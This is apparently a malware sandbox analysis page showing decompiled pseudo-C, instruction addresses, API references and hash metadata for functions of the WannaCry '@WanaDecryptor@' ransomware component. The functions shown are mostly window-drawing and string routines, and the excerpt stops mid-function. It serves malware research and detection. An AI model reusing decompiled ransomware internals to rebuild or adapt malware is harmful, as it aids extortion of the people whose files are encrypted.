								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

































                                                      0x004090f6
                                                      0x004090f8
                                                      0x004090fd
                                                      0x004090fe
                                                      0x00409105
                                                      0x0040910c
                                                      0x00409115
                                                      0x0040911c
                                                      0x0040911e
                                                      0x0040971e
                                                      0x00409729
                                                      0x00409736
                                                      0x00409736
                                                      0x00409124
                                                      0x0040912f
                                                      0x00409133
                                                      0x00409137
                                                      0x00409142
                                                      0x00409143
                                                      0x0040914a
                                                      0x00409152
                                                      0x0040915c
                                                      0x0040918c
                                                      0x0040918e
                                                      0x00409197
                                                      0x00409197
                                                      0x0040919c
                                                      0x004091a7
                                                      0x004091ad
                                                      0x004091b1
                                                      0x004091bb
                                                      0x004091bf
                                                      0x004091c4
                                                      0x0040915e
                                                      0x00409163
                                                      0x0040916c
                                                      0x0040916e
                                                      0x00409177
                                                      0x00409177
                                                      0x0040917f
                                                      0x0040917f
                                                      0x00409163
                                                      0x004091c8
                                                      0x004091cf
                                                      0x0040970a
                                                      0x0040970e
                                                      0x00409719
                                                      0x00000000
                                                      0x004091d5
                                                      0x004091dd
                                                      0x004091e4
                                                      0x004091e9
                                                      0x004091eb
                                                      0x004091ef
                                                      0x004091fb
                                                      0x00409203
                                                      0x00409208
                                                      0x00409215
                                                      0x0040921d
                                                      0x00409225
                                                      0x0040922d
                                                      0x00409235
                                                      0x0040923e
                                                      0x00409246
                                                      0x0040924e
                                                      0x00409256
                                                      0x00409259
                                                      0x00409260
                                                      0x00409264
                                                      0x0040926b
                                                      0x0040926f
                                                      0x00409277
                                                      0x00409282
                                                      0x0040928d
                                                      0x00409292
                                                      0x00409296
                                                      0x0040929d
                                                      0x004092a1
                                                      0x004092a5
                                                      0x004092ad
                                                      0x004092b8
                                                      0x004092c0
                                                      0x004092c5
                                                      0x004092c9
                                                      0x004092d9
                                                      0x004092e1
                                                      0x004092f3
                                                      0x004092f7
                                                      0x004092fb
                                                      0x00409308
                                                      0x0040930d
                                                      0x0040930e
                                                      0x0040930f
                                                      0x00409317
                                                      0x0040931c
                                                      0x0040931f
                                                      0x00409323
                                                      0x00409327
                                                      0x00409337
                                                      0x00409355
                                                      0x00409357
                                                      0x00409357
                                                      0x0040935b
                                                      0x0040935f
                                                      0x00409363
                                                      0x0040936f
                                                      0x0040937b
                                                      0x00409381
                                                      0x00409389
                                                      0x004093a4
                                                      0x004093bd
                                                      0x004093de
                                                      0x00000000
                                                      0x00000000
                                                      0x004093e0
                                                      0x004093e8
                                                      0x004093ec
                                                      0x004093f0
                                                      0x004093f2
                                                      0x004093f2
                                                      0x00000000
                                                      0x004093f2
                                                      0x004093bf
                                                      0x004093c7
                                                      0x004093cb
                                                      0x004093cf
                                                      0x004093d3
                                                      0x00000000
                                                      0x004093d3
                                                      0x004093a6
                                                      0x004093ae
                                                      0x004093b2
                                                      0x00000000
                                                      0x0040938b
                                                      0x0040938f
                                                      0x00409393
                                                      0x00409397
                                                      0x0040939b
                                                      0x004093f6
                                                      0x004093ff
                                                      0x0040940b
                                                      0x004094b9
                                                      0x004094cc
                                                      0x004094d5
                                                      0x004094e8
                                                      0x004094f3
                                                      0x00409517
                                                      0x00409525
                                                      0x00409537
                                                      0x00409537
                                                      0x0040953d
                                                      0x00409553
                                                      0x0040955d
                                                      0x00409568
                                                      0x0040956a
                                                      0x0040956a
                                                      0x0040956e
                                                      0x00409572
                                                      0x00409579
                                                      0x00409580
                                                      0x0040958e
                                                      0x0040959b
                                                      0x004095ad
                                                      0x004095ad
                                                      0x004095bf
                                                      0x0040961a
                                                      0x0040962d
                                                      0x00409634
                                                      0x0040963c
                                                      0x00409641
                                                      0x00409649
                                                      0x0040964d
                                                      0x00409658
                                                      0x0040965a
                                                      0x0040965d
                                                      0x0040965d
                                                      0x00409662
                                                      0x0040966d
                                                      0x00409671
                                                      0x0040967b
                                                      0x0040967d
                                                      0x00409680
                                                      0x00409680
                                                      0x00409685
                                                      0x0040968d
                                                      0x00409691
                                                      0x0040969c
                                                      0x004096a3
                                                      0x004096a3
                                                      0x004096a6
                                                      0x004096ae
                                                      0x004096b2
                                                      0x004096bc
                                                      0x004096c5
                                                      0x004096c5
                                                      0x004096cc
                                                      0x004096d4
                                                      0x004096d9
                                                      0x004096dd
                                                      0x004096e5
                                                      0x004096ed
                                                      0x004096f5
                                                      0x004096fa
                                                      0x00409702
                                                      0x00000000
                                                      0x004095c1
                                                      0x004095c9
                                                      0x004095d1
                                                      0x004095d3
                                                      0x004095d3
                                                      0x004095e0
                                                      0x004095eb
                                                      0x004095ef
                                                      0x004095fc
                                                      0x00409604
                                                      0x00409608
                                                      0x0040960a
                                                      0x0040960b
                                                      0x0040960c
                                                      0x00409610
                                                      0x00409614
                                                      0x00000000
                                                      0x00409614
                                                      0x004095bf
                                                      0x0040950c
                                                      0x00000000
                                                      0x0040950c
                                                      0x00409421
                                                      0x0040942c
                                                      0x00409430
                                                      0x00409432
                                                      0x00409432
                                                      0x00409444
                                                      0x00000000
                                                      0x0040944a
                                                      0x0040945c
                                                      0x0040945f
                                                      0x00409467
                                                      0x00409478
                                                      0x0040948e
                                                      0x00409491
                                                      0x0040949b
                                                      0x0040949c
                                                      0x004094a3
                                                      0x00000000
                                                      0x004094a3
                                                      0x00409444
                                                      0x00409389

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                                      • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                                      • API String ID: 2923375784-3599407550
                                                      • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                                      • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

















































                                                      0x00405236
                                                      0x00405238
                                                      0x0040523d
                                                      0x0040523e
                                                      0x0040524b
                                                      0x0040524e
                                                      0x00405254
                                                      0x00405369
                                                      0x00405552
                                                      0x0040555a
                                                      0x00405560
                                                      0x00405568
                                                      0x00405572
                                                      0x00405572
                                                      0x0040536f
                                                      0x00405373
                                                      0x0040539e
                                                      0x0040539e
                                                      0x004053a1
                                                      0x004053a4
                                                      0x00405430
                                                      0x00405433
                                                      0x004054b4
                                                      0x004054b6
                                                      0x00405503
                                                      0x00405506
                                                      0x00000000
                                                      0x00000000
                                                      0x0040550b
                                                      0x0040550e
                                                      0x00405511
                                                      0x00405516
                                                      0x00405517
                                                      0x00405519
                                                      0x0040551b
                                                      0x00000000
                                                      0x00000000
                                                      0x0040551d
                                                      0x0040551f
                                                      0x00000000
                                                      0x00000000
                                                      0x00405521
                                                      0x00405523
                                                      0x00405525
                                                      0x00000000
                                                      0x00000000
                                                      0x00405527
                                                      0x00405529
                                                      0x00405534
                                                      0x00405535
                                                      0x00405536
                                                      0x0040553e
                                                      0x00405542
                                                      0x00405545
                                                      0x0040554a
                                                      0x0040554d
                                                      0x0040554f
                                                      0x0040554f
                                                      0x0040554f
                                                      0x00000000
                                                      0x00405529
                                                      0x004054bb
                                                      0x004054be
                                                      0x004054c1
                                                      0x004054c6
                                                      0x004054c7
                                                      0x004054c9
                                                      0x004054cb
                                                      0x004054d1
                                                      0x004054d1
                                                      0x004054d6
                                                      0x004054d6
                                                      0x004054d8
                                                      0x004054da
                                                      0x00000000
                                                      0x00000000
                                                      0x004054dc
                                                      0x004054de
                                                      0x004054e6
                                                      0x004054e7
                                                      0x004054ea
                                                      0x004054ef
                                                      0x004054f1
                                                      0x004054f4
                                                      0x004054f9
                                                      0x004054fc
                                                      0x004054fe
                                                      0x004054fe
                                                      0x004054fe
                                                      0x00000000
                                                      0x00405501
                                                      0x004054cd
                                                      0x004054cf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004054cf
                                                      0x0040543b
                                                      0x0040543f
                                                      0x00405440
                                                      0x00405443
                                                      0x0040544f
                                                      0x00405450
                                                      0x00405453
                                                      0x0040545b
                                                      0x00405468
                                                      0x0040546b
                                                      0x0040546c
                                                      0x0040546d
                                                      0x00405471
                                                      0x00405476
                                                      0x00405479
                                                      0x0040547e
                                                      0x00405487
                                                      0x0040548b
                                                      0x00405494
                                                      0x00405499
                                                      0x004054a2
                                                      0x004054aa
                                                      0x00000000
                                                      0x004054aa
                                                      0x004053b4
                                                      0x004053b5
                                                      0x004053b8
                                                      0x004053c3
                                                      0x004053d1
                                                      0x004053d5
                                                      0x004053d6
                                                      0x004053d7
                                                      0x004053dc
                                                      0x004053dd
                                                      0x004053e7
                                                      0x004053e8
                                                      0x004053e9
                                                      0x004053ed
                                                      0x004053f2
                                                      0x004053f5
                                                      0x004053fa
                                                      0x00405403
                                                      0x00405407
                                                      0x00405410
                                                      0x00405415
                                                      0x0040541e
                                                      0x00405426
                                                      0x00000000
                                                      0x00405426
                                                      0x0040537b
                                                      0x00405381
                                                      0x00405384
                                                      0x00405386
                                                      0x00000000
                                                      0x00000000
                                                      0x00405388
                                                      0x0040538a
                                                      0x0040538c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040538e
                                                      0x00405390
                                                      0x00405393
                                                      0x00405396
                                                      0x0040539b
                                                      0x0040539b
                                                      0x0040539b
                                                      0x00000000
                                                      0x00405390
                                                      0x0040525d
                                                      0x00405285
                                                      0x00405288
                                                      0x0040528d
                                                      0x004052f9
                                                      0x004052fa
                                                      0x004052fb
                                                      0x004052fc
                                                      0x00405303
                                                      0x00405307
                                                      0x00405309
                                                      0x0040530c
                                                      0x00405314
                                                      0x00405319
                                                      0x00405320
                                                      0x00405321
                                                      0x00405322
                                                      0x00405326
                                                      0x0040532b
                                                      0x0040532e
                                                      0x00405333
                                                      0x0040533c
                                                      0x00405340
                                                      0x00405349
                                                      0x0040534e
                                                      0x00405357
                                                      0x0040535f
                                                      0x0040528f
                                                      0x00405295
                                                      0x00405297
                                                      0x00405298
                                                      0x0040529c
                                                      0x004052a0
                                                      0x004052a9
                                                      0x004052b1
                                                      0x004052b2
                                                      0x004052b3
                                                      0x004052b7
                                                      0x004052b8
                                                      0x004052bd
                                                      0x004052c0
                                                      0x004052c5
                                                      0x004052ce
                                                      0x004052d3
                                                      0x004052dc
                                                      0x004052e4
                                                      0x004052e4
                                                      0x00000000
                                                      0x0040528d
                                                      0x00405265
                                                      0x00405268
                                                      0x0040526d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040526f
                                                      0x00405273
                                                      0x00000000
                                                      0x00000000
                                                      0x00405275
                                                      0x00405277
                                                      0x0040527a
                                                      0x0040527d
                                                      0x00405282
                                                      0x00405282
                                                      0x00000000

                                                      APIs
                                                      • #940.MFC42(?), ref: 0040527D
                                                      • #4277.MFC42(?,00000001), ref: 004052A0
                                                      • #923.MFC42(?,00000000,?), ref: 004052B8
                                                      • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                                      • #4129.MFC42(?,?), ref: 004052FC
                                                      • #5710.MFC42 ref: 00405314
                                                      • #922.MFC42(?,00000000,00000000), ref: 00405326
                                                      • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                                      • #940.MFC42(?), ref: 00405396
                                                      • #5710.MFC42(?,?), ref: 004053B8
                                                      • #4129.MFC42(?,?,?,?), ref: 004053D7
                                                      • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                                      • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                                      • #4129.MFC42(?,?), ref: 00405443
                                                      • #4277.MFC42(?,?,?,?), ref: 0040545B
                                                      • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                                      • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                                      • #6778.MFC42(?,00000001), ref: 004054EA
                                                      • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                                      • #6778.MFC42(00000000,?), ref: 00405536
                                                      • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                                      • String ID:
                                                      • API String ID: 2121400562-0
                                                      • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                                      • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
